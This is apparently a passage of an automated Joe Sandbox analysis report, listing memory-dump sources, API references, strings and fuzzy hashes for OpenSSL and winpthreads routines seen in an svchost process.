                                                                                              • API ID: D_bytes_exR_newR_set_debugR_set_error
                                                                                              • String ID: ossl_quic_gen_rand_conn_id$ssl\quic\quic_types.c
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$FileSystem
                                                                                              • String ID:
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$CloseCurrentHandleSleepThread__iob_func_endthreadex
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 64942C62
                                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,64941698), ref: 64942CAD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentObjectSingleThreadWait
                                                                                              • String ID:
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID:
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: N_clear_freeN_dup$N_exP_create_verifier_P_get_default_g
                                                                                              • String ID:
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB42EF20: ERR_set_mark.LIBCRYPTO-3-X64(?,00007FFBAB4169A9), ref: 00007FFBAB42EF4C
                                                                                                • Part of subcall function 00007FFBAB42EF20: OBJ_nid2sn.LIBCRYPTO-3-X64(?,00007FFBAB4169A9), ref: 00007FFBAB42EF53
                                                                                                • Part of subcall function 00007FFBAB42EF20: EVP_MD_fetch.LIBCRYPTO-3-X64(?,00007FFBAB4169A9), ref: 00007FFBAB42EF61
                                                                                                • Part of subcall function 00007FFBAB42EF20: ERR_pop_to_mark.LIBCRYPTO-3-X64(?,00007FFBAB4169A9), ref: 00007FFBAB42EF69
                                                                                              • EVP_MD_CTX_new.LIBCRYPTO-3-X64 ref: 00007FFBAB488CA3
                                                                                              • EVP_DigestUpdate.LIBCRYPTO-3-X64 ref: 00007FFBAB488CCF
                                                                                              • EVP_DigestUpdate.LIBCRYPTO-3-X64 ref: 00007FFBAB488CE8
                                                                                              • EVP_DigestFinal_ex.LIBCRYPTO-3-X64 ref: 00007FFBAB488CFC
                                                                                              • EVP_MD_CTX_free.LIBCRYPTO-3-X64 ref: 00007FFBAB488D08
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Digest$Update$D_fetchFinal_exJ_nid2snR_pop_to_markR_set_markX_freeX_new
                                                                                              • String ID:
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleValue$_endthreadex
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,?,?,?,?,64949064,?,?,?,?,649412F5), ref: 64947BB0
                                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,64949064,?,?,?,?,649412F5), ref: 64947BD2
                                                                                              Strings
                                                                                              • Unknown pseudo relocation bit size %d., xrefs: 64947C8C
                                                                                              • VirtualQuery failed for %d bytes at address %p, xrefs: 649479CC, 64947CD6
                                                                                              • Unknown pseudo relocation protocol version %d., xrefs: 64947CED
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                               • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$ProtectQuery
                                                                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_write_early_data$ssl\ssl_lib.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ssl\t1_lib.c$tls12_copy_sigalgs
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_indentO_printf
                                                                                              • String ID: %s (%d)
                                                                                              • API String ID: 1860387303-2206749211
                                                                                              • Opcode ID: 08b5bfe54d974706d67bed0f7f65379c65b6c8027aacb01334adf5610ed9290b
                                                                                              • Instruction ID: 65c430236495d1db4750eec3cae70f0127a32862a8157e27fea278d6370c427a
                                                                                              • Opcode Fuzzy Hash: 08b5bfe54d974706d67bed0f7f65379c65b6c8027aacb01334adf5610ed9290b
                                                                                              • Instruction Fuzzy Hash: 5631D3B2B0E69286EF6B8B31D4611BD2F51AB45B90F04C432CEAC077A2DE7CE5618700
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_parse_ctos_client_cert_type
                                                                                              • API String ID: 193678381-2187535903
                                                                                              • Opcode ID: a0df0ec2b0c4ca5525618f5e6cffa68395d75fab59e484bf3628410bd0089639
                                                                                              • Instruction ID: 9d09da9e3d2b47cff970c034219a9dbe7058c756bfefedaf0e2b144acff01f75
                                                                                              • Opcode Fuzzy Hash: a0df0ec2b0c4ca5525618f5e6cffa68395d75fab59e484bf3628410bd0089639
                                                                                              • Instruction Fuzzy Hash: 5321D3E2B0A68286EB42CBB5D4013F92390EF51788F04C431EE9D476B6EF2CD5958311
                                                                                              Similarity
                                                                                              • API ID: R_new$O_zallocR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_supported_versions
                                                                                              • API String ID: 3661993454-4203788918
                                                                                              • Opcode ID: 0d8c01ad44f015bf23749a31f02f3c04219228765ccaf1e70f6f178e2eb9a7a7
                                                                                              • Instruction ID: 5371ad85e7a0c226d8a6edc6e921168f6b01a1017c475c01e3e96da1e27c8452
                                                                                              • Opcode Fuzzy Hash: 0d8c01ad44f015bf23749a31f02f3c04219228765ccaf1e70f6f178e2eb9a7a7
                                                                                              • Instruction Fuzzy Hash: AB218EA1F0A18242FA6297B6E9917B91391AF847C0F04C031EE2D876F6DF2DE9858300
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ssl3_do_change_cipher_spec$ssl\s3_msg.c
                                                                                              • API String ID: 1552677711-2944025119
                                                                                              • Opcode ID: ad1e7d3c941517d6f17de9c1cf47e1a4117bab22cf195348e66dc2d02bf2a5da
                                                                                              • Instruction ID: 07448c9d07944e184a22e189aa9bad68ffb0434a159d89d2f466d8ba9eb0faa9
                                                                                              • Opcode Fuzzy Hash: ad1e7d3c941517d6f17de9c1cf47e1a4117bab22cf195348e66dc2d02bf2a5da
                                                                                              • Instruction Fuzzy Hash: 632175B2B1A74182E7459B35E4863BD23A0EB54B84F588436DE2D473B5DF38C8D6C300
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugmemcpymemset
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_construct_next_proto
                                                                                              • API String ID: 2334240134-950454232
                                                                                              • Opcode ID: 99744c31a9a6a3c705792112e2e6bf0cb08241c1d2a8805dc1ecf0a91c0cdafb
                                                                                              • Instruction ID: db333fd6b6c39d6b3021e360be454ce9cbc3ac303517a1a546da5642b61dde95
                                                                                              • Opcode Fuzzy Hash: 99744c31a9a6a3c705792112e2e6bf0cb08241c1d2a8805dc1ecf0a91c0cdafb
                                                                                              • Instruction Fuzzy Hash: 4311B2A2B1D78281E751D772F8457EA6320EB84BC4F449031EE6D87BA6DE2DE5818700
                                                                                              Similarity
                                                                                              • API ID: O_indentO_printf
                                                                                              • String ID: %s=0x%x (%s)$cookie$server_version
                                                                                              • API String ID: 1860387303-2821402668
                                                                                              • Opcode ID: dc55b136458b3956da420a4ced34826eb6fd4667b45e9e87ee36ed3099cd13aa
                                                                                              • Instruction ID: a5681995522ecf8121efb770a393b60d59b62ee7913ac9dff392dde7e8ecd4a7
                                                                                              • Opcode Fuzzy Hash: dc55b136458b3956da420a4ced34826eb6fd4667b45e9e87ee36ed3099cd13aa
                                                                                              • Instruction Fuzzy Hash: 041134B2B0A6D142EA168B74E4250B87A02EB80328F01C232CEBC027F1CE3CD5A6C304
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB46F3F2), ref: 00007FFBAB490FFC
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB46F3F2), ref: 00007FFBAB491014
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • BIO_set_flags.LIBCRYPTO-3-X64(?,00007FFBAB46F3F2), ref: 00007FFBAB49106C
                                                                                              Similarity
                                                                                              • API ID: O_set_flagsR_newR_set_debugR_vset_error
                                                                                              • String ID: dtls1_read_failed$ssl\statem\statem_dtls.c
                                                                                              • API String ID: 617247779-2547669737
                                                                                              • Opcode ID: e64f7d3fdb65d1a11c8079e2c9def8cf12f6eae16bcb5b8bc65eaf0d7f2e0a76
                                                                                              • Instruction ID: 713b2843d0a8e098292924131240e23220d2268ce62886cbfd8d680661cc512e
                                                                                              • Opcode Fuzzy Hash: e64f7d3fdb65d1a11c8079e2c9def8cf12f6eae16bcb5b8bc65eaf0d7f2e0a76
                                                                                              • Instruction Fuzzy Hash: 62016DA1F5A14356F6A2A77AE9936BE12509F847C0F089031EE3D876B7ED2DE8804640
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ossl_quic_rstream_queue_data$ssl\quic\quic_rstream.c
                                                                                              • API String ID: 1552677711-468918440
                                                                                              • Opcode ID: 07d302c16cb975c7cbcdc96ac8009da06d46e2be223d517764e6b9399bc91862
                                                                                              • Instruction ID: deb54e4a602e880cb6db51d1a25d230cb9d937d050803cf854eb30e482428e01
                                                                                              • Opcode Fuzzy Hash: 07d302c16cb975c7cbcdc96ac8009da06d46e2be223d517764e6b9399bc91862
                                                                                              • Instruction Fuzzy Hash: 1611A7A1B1A68182FEA79735E4A237E2351BF95740F90D039ED5D427A5DE3CE8098A01
                                                                                              Similarity
                                                                                              • API ID: O_ctrlR_newR_set_debug
                                                                                              • String ID: dtls1_check_timeout_num$ssl\d1_lib.c
                                                                                              • API String ID: 2442628283-4185249889
                                                                                              • Opcode ID: b1a9a4547ff906208184b0367555025d3ef1f003377d235aedb0efbc53b3a662
                                                                                              • Instruction ID: 015955793a6a183f37bc60a6b72266434bae34ef3294b975a202eece2bf4fdeb
                                                                                              • Opcode Fuzzy Hash: b1a9a4547ff906208184b0367555025d3ef1f003377d235aedb0efbc53b3a662
                                                                                              • Instruction Fuzzy Hash: CF1186B2E1A241C2E792AB75D4926FC3361EF84F44F488536DE2D477A5DF289581C704
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_MD_get0_name.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435A0
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_KDF_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435B8
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_new.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435D4
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435EC
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_error.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435FD
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_KDF_CTX_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443605
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB44279E), ref: 00007FFBAB44295E
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB44279E), ref: 00007FFBAB442974
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_get0_nameF_freeR_set_errorR_vset_errorX_free
                                                                                              • String ID: finished$ssl\tls13_enc.c$tls13_hkdf_expand
                                                                                              • API String ID: 3505470307-1348237582
                                                                                              • Opcode ID: cf3ea33bb4df626c872050f9431ae6102b77338d0bd7d74f79670d10d5f2bc83
                                                                                              • Instruction ID: f0a01cae23ac9f48f14447d773fe37ac390a343c496f37374904f158cc409b52
                                                                                              • Opcode Fuzzy Hash: cf3ea33bb4df626c872050f9431ae6102b77338d0bd7d74f79670d10d5f2bc83
                                                                                              • Instruction Fuzzy Hash: 1C11ACB2A19B8282D711CB25F4802AEB3A4FB88B84F108035EE9C43779DF38C1548B00
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_set_tlsext_max_fragment_length$ssl\t1_lib.c
                                                                                              • API String ID: 1552677711-2905481694
                                                                                              APIs
                                                                                              Strings
                                                                                              • ../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 649433B6
                                                                                              • (, xrefs: 649433AE
                                                                                              • Assertion failed: (%s), file %s, line %d, xrefs: 649433C8
                                                                                              • (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 649433C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: __iob_func
                                                                                              • String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
                                                                                              • API String ID: 686374508-3651547468
                                                                                              APIs
                                                                                              • OPENSSL_LH_set_down_load.LIBCRYPTO-3-X64(?,00007FFBAB45A6FB,?,00007FFBAB44B921), ref: 00007FFBAB45A3CF
                                                                                              • OPENSSL_LH_doall_arg.LIBCRYPTO-3-X64(?,00007FFBAB45A6FB,?,00007FFBAB44B921), ref: 00007FFBAB45A3E2
                                                                                              • OPENSSL_LH_delete.LIBCRYPTO-3-X64(?,00007FFBAB45A6FB,?,00007FFBAB44B921), ref: 00007FFBAB45A3EE
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45A6FB,?,00007FFBAB44B921), ref: 00007FFBAB45A3F7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_deleteH_doall_argH_freeH_set_down_load
                                                                                              • String ID: ssl\quic\quic_lcidm.c
                                                                                              • API String ID: 473658108-3923830422
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ssl3_ctrl$ssl\s3_lib.c
                                                                                              • API String ID: 1552677711-3530330221
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ossl_quic_tx_packetiser_set_cur_scid$ssl\quic\quic_txp.c
                                                                                              • API String ID: 1552677711-511327206
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ossl_quic_tx_packetiser_set_cur_dcid$ssl\quic\quic_txp.c
                                                                                              • API String ID: 1552677711-1342796716
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
